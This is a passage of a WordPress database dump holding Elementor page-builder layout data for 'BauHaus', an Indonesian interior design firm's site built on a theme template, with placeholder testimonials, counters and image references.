BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3671,4845,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3672,4845,'_elementor_pro_version','3.8.1'),(3673,4846,'_wp_page_template','elementor_header_footer'),(3674,4846,'_elementor_edit_mode','builder'),(3675,4846,'_elementor_template_type','wp-page'),(3676,4846,'_elementor_version','3.8.1'),(3677,4846,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"\\\"Let\'s turn your ideas into reality\\\"\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure 